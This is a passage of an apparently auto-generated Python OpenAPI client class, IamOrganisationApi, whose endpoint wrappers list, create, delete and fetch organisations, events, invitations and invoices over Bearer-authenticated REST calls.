from h1.model.organisation import Organisation
from h1.model.ownership import Ownership
from h1.model.payment import Payment
from h1.model.proforma import Proforma
from h1.model.resource_service import ResourceService
from h1.model.transfer import Transfer
class IamOrganisationApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __iam_organisation_billing_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.billing # noqa: E501
List iam/organisation.billing # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_billing_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
start (datetime): start. [optional]
end (datetime): end. [optional]
resource_type (str): resource.type. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Billing]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_billing_list = _Endpoint(
settings={
'response_type': ([Billing],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/billing',
'operation_id': 'iam_organisation_billing_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'start',
'end',
'resource_type',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'start':
(datetime,),
'end':
(datetime,),
'resource_type':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'start': 'start',
'end': 'end',
'resource_type': 'resource.type',
},
'location_map': {
'organisation_id': 'path',
'start': 'query',
'end': 'query',
'resource_type': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_billing_list
)
def __iam_organisation_create(
self,
iam_organisation_create,
**kwargs
):
"""Create iam/organisation # noqa: E501
Create organisation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_create(iam_organisation_create, async_req=True)
>>> result = thread.get()
Args:
iam_organisation_create (IamOrganisationCreate):
Keyword Args:
x_idempotency_key (str): Idempotency key. [optional]
x_dry_run (str): Dry run. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Organisation
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['iam_organisation_create'] = \
iam_organisation_create
return self.call_with_http_info(**kwargs)
self.iam_organisation_create = _Endpoint(
settings={
'response_type': (Organisation,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation',
'operation_id': 'iam_organisation_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'iam_organisation_create',
'x_idempotency_key',
'x_dry_run',
],
'required': [
'iam_organisation_create',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'iam_organisation_create':
(IamOrganisationCreate,),
'x_idempotency_key':
(str,),
'x_dry_run':
(str,),
},
'attribute_map': {
'x_idempotency_key': 'x-idempotency-key',
'x_dry_run': 'x-dry-run',
},
'location_map': {
'iam_organisation_create': 'body',
'x_idempotency_key': 'header',
'x_dry_run': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__iam_organisation_create
)
def __iam_organisation_delete(
self,
organisation_id,
**kwargs
):
"""Delete iam/organisation # noqa: E501
Delete organisation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_delete(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_delete = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}',
'operation_id': 'iam_organisation_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'organisation_id',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_delete
)
def __iam_organisation_event_get(
self,
organisation_id,
event_id,
**kwargs
):
"""Get iam/organisation.event # noqa: E501
Get iam/organisation.event # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_event_get(organisation_id, event_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
event_id (str): eventId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Event
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['event_id'] = \
event_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_event_get = _Endpoint(
settings={
'response_type': (Event,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/event/{eventId}',
'operation_id': 'iam_organisation_event_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'event_id',
],
'required': [
'organisation_id',
'event_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'event_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'event_id': 'eventId',
},
'location_map': {
'organisation_id': 'path',
'event_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_event_get
)
def __iam_organisation_event_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.event # noqa: E501
List iam/organisation.event # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_event_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
limit (float): $limit. [optional] if omitted the server will use the default value of 100
skip (float): $skip. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Event]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_event_list = _Endpoint(
settings={
'response_type': ([Event],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/event',
'operation_id': 'iam_organisation_event_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'limit',
'skip',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
'limit',
]
},
root_map={
'validations': {
('limit',): {
'inclusive_maximum': 1000,
'inclusive_minimum': 1,
},
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'limit':
(float,),
'skip':
(float,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'limit': '$limit',
'skip': '$skip',
},
'location_map': {
'organisation_id': 'path',
'limit': 'query',
'skip': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_event_list
)
def __iam_organisation_get(
self,
organisation_id,
**kwargs
):
"""Get iam/organisation # noqa: E501
Returns a single organisation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_get(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Organisation
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_get = _Endpoint(
settings={
'response_type': (Organisation,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}',
'operation_id': 'iam_organisation_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_get
)
def __iam_organisation_invitation_accept(
self,
organisation_id,
invitation_id,
iam_organisation_invitation_accept,
**kwargs
):
"""Accept iam/organisation.invitation # noqa: E501
action accept # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invitation_accept(organisation_id, invitation_id, iam_organisation_invitation_accept, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
invitation_id (str): invitationId
iam_organisation_invitation_accept (IamOrganisationInvitationAccept):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Invitation
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['invitation_id'] = \
invitation_id
kwargs['iam_organisation_invitation_accept'] = \
iam_organisation_invitation_accept
return self.call_with_http_info(**kwargs)
self.iam_organisation_invitation_accept = _Endpoint(
settings={
'response_type': (Invitation,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invitation/{invitationId}/actions/accept',
'operation_id': 'iam_organisation_invitation_accept',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'invitation_id',
'iam_organisation_invitation_accept',
],
'required': [
'organisation_id',
'invitation_id',
'iam_organisation_invitation_accept',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'invitation_id':
(str,),
'iam_organisation_invitation_accept':
(IamOrganisationInvitationAccept,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'invitation_id': 'invitationId',
},
'location_map': {
'organisation_id': 'path',
'invitation_id': 'path',
'iam_organisation_invitation_accept': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__iam_organisation_invitation_accept
)
def __iam_organisation_invitation_delete(
self,
organisation_id,
invitation_id,
**kwargs
):
"""Delete iam/organisation.invitation # noqa: E501
Delete iam/organisation.invitation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invitation_delete(organisation_id, invitation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
invitation_id (str): invitationId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['invitation_id'] = \
invitation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_invitation_delete = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invitation/{invitationId}',
'operation_id': 'iam_organisation_invitation_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'invitation_id',
],
'required': [
'organisation_id',
'invitation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'invitation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'invitation_id': 'invitationId',
},
'location_map': {
'organisation_id': 'path',
'invitation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_invitation_delete
)
def __iam_organisation_invitation_get(
self,
organisation_id,
invitation_id,
**kwargs
):
"""Get iam/organisation.invitation # noqa: E501
Get iam/organisation.invitation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invitation_get(organisation_id, invitation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
invitation_id (str): invitationId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Invitation
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['invitation_id'] = \
invitation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_invitation_get = _Endpoint(
settings={
'response_type': (Invitation,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invitation/{invitationId}',
'operation_id': 'iam_organisation_invitation_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'invitation_id',
],
'required': [
'organisation_id',
'invitation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'invitation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'invitation_id': 'invitationId',
},
'location_map': {
'organisation_id': 'path',
'invitation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_invitation_get
)
def __iam_organisation_invitation_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.invitation # noqa: E501
List iam/organisation.invitation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invitation_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
resource (str): resource. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Invitation]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_invitation_list = _Endpoint(
settings={
'response_type': ([Invitation],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invitation',
'operation_id': 'iam_organisation_invitation_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'resource',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'resource':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'resource': 'resource',
},
'location_map': {
'organisation_id': 'path',
'resource': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_invitation_list
)
def __iam_organisation_invoice_download(
self,
organisation_id,
invoice_id,
**kwargs
):
"""Download iam/organisation.invoice # noqa: E501
action download # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invoice_download(organisation_id, invoice_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
invoice_id (str): invoiceId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
file_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['invoice_id'] = \
invoice_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_invoice_download = _Endpoint(
settings={
'response_type': (file_type,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invoice/{invoiceId}/actions/download',
'operation_id': 'iam_organisation_invoice_download',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'invoice_id',
],
'required': [
'organisation_id',
'invoice_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'invoice_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'invoice_id': 'invoiceId',
},
'location_map': {
'organisation_id': 'path',
'invoice_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/pdf',
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_invoice_download
)
def __iam_organisation_invoice_get(
self,
organisation_id,
invoice_id,
**kwargs
):
"""Get iam/organisation.invoice # noqa: E501
Get iam/organisation.invoice # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invoice_get(organisation_id, invoice_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
invoice_id (str): invoiceId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Invoice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['invoice_id'] = \
invoice_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_invoice_get = _Endpoint(
settings={
'response_type': (Invoice,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invoice/{invoiceId}',
'operation_id': 'iam_organisation_invoice_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'invoice_id',
],
'required': [
'organisation_id',
'invoice_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'invoice_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'invoice_id': 'invoiceId',
},
'location_map': {
'organisation_id': 'path',
'invoice_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_invoice_get
)
def __iam_organisation_invoice_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.invoice # noqa: E501
List iam/organisation.invoice # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invoice_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
